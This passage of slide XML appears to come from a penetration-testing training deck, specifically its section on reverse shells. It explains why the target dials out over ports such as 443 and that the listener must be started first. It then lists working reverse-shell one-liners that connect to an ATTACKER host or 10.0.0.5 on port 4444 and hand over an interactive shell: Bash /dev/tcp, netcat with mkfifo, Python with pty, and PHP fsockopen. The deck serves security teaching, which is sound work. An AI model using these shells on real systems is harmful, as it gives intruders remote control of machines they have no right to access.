        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3931920" y="3401568"/>
            <a:ext cx="4389120" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EE28A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>outbound connection, usually allowed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="4434840"/>
            <a:ext cx="5486400" cy="2103120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>You listen, the target dials out. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Outbound traffic to port 443 or 80 rarely raises an eyebrow.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>This is the default in real work. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Every payload you will pick in Metasploit is a reverse payload for this reason.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Start the listener first. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>If the target calls and nobody answers, you lose the shell and often the exploit attempt.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="4434840"/>
            <a:ext cx="5212080" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>ON YOU, THEN ON THE TARGET</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="4773168"/>
            <a:ext cx="5239512" cy="1388047"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3953"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E1338"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6547104" y="4910328"/>
            <a:ext cx="4946904" cy="1113727"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1668"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t># attacker, first</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1668"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>nc -lvnp 4444</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1668"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1668"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t># target</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1668"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>bash -i &gt;&amp; /dev/tcp/10.0.0.5/4444 0&gt;&amp;1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="11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05 / SHELLS</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Reverse shell one liners worth memorising</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43</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="1481328"/>
            <a:ext cx="3657600" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Bash</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1792224"/>
            <a:ext cx="10607040" cy="531749"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10318"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E1338"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="694944" y="1929384"/>
            <a:ext cx="10314432" cy="257429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1595"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>bash -i &gt;&amp; /dev/tcp/ATTACKER/4444 0&gt;&amp;1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="2488565"/>
            <a:ext cx="3657600" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Netcat with mkfifo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="2799461"/>
            <a:ext cx="10607040" cy="531749"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10318"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E1338"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="694944" y="2936621"/>
            <a:ext cx="10314432" cy="257429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1595"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2&gt;&amp;1|nc ATTACKER 4444 &gt;/tmp/f</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="3495802"/>
            <a:ext cx="3657600" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Python 3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="3806698"/>
            <a:ext cx="10607040" cy="734314"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 7471"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E1338"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="694944" y="3943858"/>
            <a:ext cx="10314432" cy="459994"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1595"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("ATTACKER",4444));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1595"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>  [os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn("/bin/bash")'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="4705604"/>
            <a:ext cx="3657600" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="5016500"/>
            <a:ext cx="10607040" cy="531749"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10318"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E1338"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="694944" y="5153660"/>
            <a:ext cx="10314432" cy="257429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1595"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>php -r '$s=fsockopen("ATTACKER",4444);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Shape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="5806440"/>
            <a:ext cx="10607040" cy="868680"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 7368"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1B1033"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="5916168"/>
            <a:ext cx="10058400" cy="658368"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Why so many:  </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>you do not get to choose what is installed on the target. Some boxes have no netcat, some have a netcat compiled without -e, some only have python. Try them in order until one connects, and keep revshells.com bookmarked.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="13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05 / SHELLS</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Catch it, then make it usable</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44</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
